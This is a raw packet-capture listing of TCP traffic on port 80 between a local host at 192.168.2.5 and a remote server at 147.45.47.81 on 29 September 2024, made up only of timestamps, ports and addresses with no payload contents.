                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.107911110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.107944012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.107959986 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.107973099 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108012915 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108021975 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108071089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108103991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108120918 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108134985 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108164072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108179092 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108194113 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108227015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108239889 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108278036 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108309984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108325005 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108342886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108376026 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108392000 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108424902 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108458042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108473063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108489990 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108521938 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108535051 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108578920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108612061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108625889 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108644009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108676910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108690977 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108709097 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108750105 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108757019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108803988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108838081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108855963 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108869076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108901024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108915091 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108932972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108966112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108978033 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.108994007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109025002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109040022 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109075069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109110117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109118938 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109158039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109190941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109208107 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109224081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109256983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109272003 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109292030 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109319925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109333992 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109352112 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109385014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109400034 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109416962 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109450102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109462976 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109482050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109513044 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109528065 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109544992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109577894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109586954 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109610081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109642029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109658003 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109673977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109709024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109714985 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109741926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109774113 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109787941 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109806061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109838009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109853029 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109869957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109901905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109924078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109931946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109965086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109977007 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.109997988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110033035 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110040903 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110061884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110093117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110105038 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110126972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110158920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110181093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110189915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110223055 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110238075 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110255957 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110287905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110297918 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110322952 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110352993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110368967 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110389948 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110421896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110424042 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110464096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110495090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110510111 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110528946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110559940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110574961 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110591888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110622883 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110635042 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110656977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110691071 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110707998 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110723972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110755920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110764980 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110788107 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110819101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110835075 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110850096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110884905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110893965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110915899 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110946894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110958099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.110980988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111015081 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111030102 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111047983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111079931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111109018 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111112118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111144066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111159086 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111176968 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111208916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111219883 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111241102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111269951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.111289024 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.160918951 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180744886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180865049 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180896997 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180923939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180931091 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180965900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180978060 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.180999041 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.181035042 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.181041956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.181070089 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.181119919 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193792105 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193842888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193893909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193896055 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193944931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193979979 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.193994045 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194014072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194060087 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194065094 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194098949 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194130898 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194140911 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194164038 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194211960 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194221020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194269896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194318056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194333076 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194371939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194420099 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194438934 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194489002 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194525003 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194530964 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194576025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194610119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194629908 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194643974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194689989 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194694996 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194729090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194762945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194777012 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194812059 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194844961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194860935 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194878101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194910049 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194922924 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194962025 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.194993973 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195010900 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195027113 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195075989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195086956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195110083 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195142984 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195158005 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195178986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195223093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195230007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195264101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195297956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195311069 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195331097 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195363045 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195378065 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195414066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195446014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195456982 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195478916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195512056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195527077 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195559978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195593119 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195609093 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195641994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195674896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195691109 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195712090 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195744991 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195759058 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195779085 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195811033 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195822001 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195839882 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195888042 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195890903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195924997 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195956945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195974112 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.195992947 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196042061 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196043015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196077108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196109056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196125984 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196142912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196171045 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196187019 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196219921 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196254015 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196269035 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196286917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196319103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196335077 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196352005 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196383953 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196399927 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196418047 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196454048 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196455956 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:15.196481943 CEST8049706147.45.47.81192.168.2.5
